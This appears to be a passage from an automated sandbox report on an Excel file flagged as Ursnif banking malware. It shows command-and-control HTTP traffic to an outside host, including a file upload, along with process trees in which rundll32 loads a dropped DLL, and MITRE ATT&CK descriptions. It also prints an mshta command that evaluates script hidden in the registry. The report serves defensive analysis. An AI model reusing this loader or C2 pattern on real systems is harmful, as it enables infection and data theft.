Feb 12, 2021 18:45:30.318304062 CET	5835	IN	Data Raw: 5e 50 5f 4c e5 c6 31 9a 88 82 ec 6c d8 60 3e fa 75 dd 91 ad 70 ca dc 5f 9b 60 14 dd a7 fe b2 d7 4f f1 c4 60 d2 be 52 f7 0a f8 06 bd 43 ac 27 32 e1 2a b7 25 05 15 9c d6 09 5b 54 6a ae d6 30 23 2a bc ef 40 c4 c3 4a d9 ed 04 7c 6f 42 02 12 cb 05 ed Data Ascii: ^P_L1l`>up_`O`RC'2%[Tj0#@J\|oB+%lZiA-)D}ubR$%5EgDI?'f*=^8[szVr4Y'/4+{D8y^)/}Faf%#Dcn~l;+XmjUgmF}xxKHt
Feb 12, 2021 18:45:30.318348885 CET	5836	IN	Data Raw: 4e 72 9b e7 16 b5 db c8 44 a9 f7 b1 71 65 64 64 60 b1 da 0c 16 8f b8 53 d1 a2 07 c4 2c ce 07 d0 55 a2 ac 93 0a 01 aa a8 21 23 e3 97 b6 bf 91 60 da ad 15 09 b0 d1 eb 48 cd ad 94 47 28 8e bb 58 9a 48 f3 6e 83 e2 8d 01 e1 e8 5f d9 1f 69 c7 21 42 59 Data Ascii: NrDqedd`S,U!#`HG(XHn_i!BY"Rb#Y27)7P="wntU_ ?y]&L=g%Ax} Cr'nv\|&g6wHLTk?N~d>,<AHkPyhv?R
Feb 12, 2021 18:45:30.392940044 CET	5837	IN	Data Raw: 93 85 14 68 47 26 7c 67 39 3f 77 88 de d4 5c 18 30 d0 14 5e de 9a 6b e5 2c 48 b0 5e 3d e3 91 af 57 bc 3d 16 94 7d 2f 2b 88 f1 7d 3b eb e7 ad 0a 9a b3 3e 5a 07 af 45 8e 04 22 7d a2 2c 36 e1 36 62 6f d9 1c 0a bb 93 98 d7 d2 b7 80 73 e6 03 40 9d 41 Data Ascii: hG&\|g9?w\0^k,H^=W=}/+};>ZE"},66bos@AP>}U$2JgNc0eWm\|b^t]}_cI>RUM\B=6mLU#H_*tfx4l?cCFI="4<[@HErLp

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49756	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2021 18:45:41.686889887 CET	5969	OUT	GET /api1/TsKcWE2WM/nJKmvtwztxYIvooVmlF8/f0GhZMHg0Zw5qyafREH/k8WCOuLk57UyBPUazjQh2Z/3S3ubdSMDgVaL/gAWRJwIA/ZCG7BHExQwWXeVA1UnuSBqn/i4n1PFTtlL/cwWi1gc5A_2Bt5DHa/KB0_2BLRegs0/BViXJpKwWgb/pjm_2BuXWxLo81/vWKBV9Fs7FvCc1nuX8q5n/wGeJRl_2FEvkYbfF/Pr91DmkaDab5rrv/0H_2FXSeTsgpPadA5E/E3CpLlb73/0qgYAbyOZODf4FqqEkA4/X5b8p4TRxQsXlnMDNwZ/TvAO43omBsbN/h HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 Host: api3.lepini.at
Feb 12, 2021 18:45:42.331084967 CET	5970	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 12 Feb 2021 17:45:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49757	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2021 18:45:42.509705067 CET	5971	OUT	POST /api1/pmT_2FJ7yMpV_2FsxCGV/80ZJDlvhk5QH3DonF9p/gMZiDS0z2g2bNrJ_2Bv_2B/DXZEEWDxEnN_2/Bx7WHkRW/wpcaGRddIyctm9GWW0oCdyR/qDXQAt7J40/6ogNDJFenwl5gVncd/SbRM7SEjzx1B/lGa_2BU69FH/bDmPVUZABXfNqj/99lThSa0HHLaHhjsVvXGB/uCBX4Mj6I29IAbCC/UnujtjeNBz5OBuo/7XOr98uUHKNs6Ghu4C/k_2BIsFhF/UXse0hUo2oKU8zO8khsV/ZbPtcIIUg_2B2PD2b0Q/KHYH7l2X48hEAXFhsSFudS/huoP4e HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 Content-Length: 2 Host: api3.lepini.at
Feb 12, 2021 18:45:42.513000011 CET	5971	OUT	Data Raw: 0d 0a Data Ascii:
Feb 12, 2021 18:45:43.089463949 CET	5972	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 12 Feb 2021 17:45:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 38 61 0d 0a 65 92 af 02 32 c3 8c 4c 6d 80 23 f8 67 8c a5 b1 d6 13 61 21 3d 81 bb ec 03 c3 74 1c 5b 13 ce df 89 00 e4 d8 6a 80 1d bf 89 95 b2 8a 72 a6 32 82 77 89 56 df d9 7a 6b e8 ed 81 b7 4c ed 1c a5 64 69 b4 83 06 ad 28 67 9a 31 dc 57 73 c3 bf 5f df fc 13 33 ca 25 57 72 2f e6 c5 bf 85 46 f1 07 f9 54 3b ad 51 64 0f 3a bd ba 2c 15 06 4f ab 38 8a ba 0a a6 48 e0 0a 66 06 57 30 36 ad e0 15 e4 fb 34 95 72 cf a2 f5 9e 40 dc 07 0d 0a 30 0d 0a 0d 0a Data Ascii: 8ae2Lm#ga!=t[jr2wVzkLdi(g1Ws_3%Wr/FT;Qd:,O8HfW064r@0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.3	49764	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2021 18:45:53.262633085 CET	6352	OUT	POST /api1/wg1QV_2B2jK6U599/4soNRq1qJ06YALs/mJi2qRbZeuNMqY4FmA/01g6652pA/D2qVqwQIRUQev6KQGCi0/LYk3CvZ2IO_2Fu9jE12/_2B2kWk8qqoKgVqzIAtHsw/z75DAZtdqon2W/3Wolp6WN/H18LH8kaewpIZWiAXdUEHcF/0Ba_2F_2B2/ICV_2BIs_2FSaSDFn/9h5nv6RAHtg8/YqIkefpDil_/2BfZRGXy7VacIh/PFUk101XGoG2wc6VBSKno/YiX6cbeIPwJJih34/1jOElbpygTipEn_/2FzdBQOzx3LF3SdNfA/TQU2svioerNtuqc/vE_2Foj HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=281829761942640994051476669676 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 Content-Length: 275 Host: api3.lepini.at
Feb 12, 2021 18:45:53.262676954 CET	6353	OUT	Data Raw: 2d 2d 32 38 31 38 32 39 37 36 31 39 34 32 36 34 30 39 39 34 30 35 31 34 37 36 36 36 39 36 37 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 70 6c 6f 61 64 5f 66 69 6c Data Ascii: --281829761942640994051476669676Content-Disposition: form-data; name="upload_file"; filename="139F.bin"LZ7.4@v\<r'j[qc_9f0PmW=-QgoD[B^s>?U4?L#DEMX\p2UyJ--28
Feb 12, 2021 18:45:53.606561899 CET	6361	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 12 Feb 2021 17:45:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Feb 12, 2021 18:43:16.960059881 CET	162.241.169.26	443	192.168.2.3	49731	CN=webdisk.cabogrupo.co.mz CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Sat Jan 16 23:28:00 CET 2021 Wed Oct 07 21:21:40 CEST 2020	Sat Apr 17 00:28:00 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Feb 12, 2021 18:43:16.960059881 CET	162.241.169.26	443	192.168.2.3	49731	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		37f463bf4616ecd445d4a1937da06e19

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 6696 Parent PID: 792

General

Start time:	18:43:08
Start date:	12/02/2021
Path:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase:	0xfa0000
File size:	27110184 bytes
MD5 hash:	5D6638F2C8F8571C593999C58866007E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 7104 Parent PID: 6696

General

Start time:	18:43:21
Start date:	12/02/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\rundll32.exe' C:\ProgramData\fsh\87.dll,DllRegisterServer
Imagebase:	0x250000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.484929367.0000000005CE8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.484909959.0000000005CE8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.491441332.0000000005B6B000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.484870003.0000000005CE8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.484795532.0000000005CE8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.484765467.0000000005CE8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.484838302.0000000005CE8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.484894517.0000000005CE8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.484953925.0000000005CE8000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 2288 Parent PID: 792

General

Start time:	18:45:07
Start date:	12/02/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff6fa8b0000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6024 Parent PID: 2288

General

Start time:	18:45:08
Start date:	12/02/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2288 CREDAT:17410 /prefetch:2
Imagebase:	0x1190000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5748 Parent PID: 2288

General

Start time:	18:45:13
Start date:	12/02/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2288 CREDAT:82952 /prefetch:2
Imagebase:	0x1190000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6336 Parent PID: 2288

General

Start time:	18:45:16
Start date:	12/02/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2288 CREDAT:17430 /prefetch:2
Imagebase:	0x1190000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: mshta.exe PID: 5428 Parent PID: 3388

General

Start time:	18:45:22
Start date:	12/02/2021
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Imagebase:	0x7ff79d1b0000
File size:	14848 bytes
MD5 hash:	197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report File_78476.xlsb

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "File_78476.xlsb"

Indicators

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Packets

Code Manipulations

Statistics

CPU Usage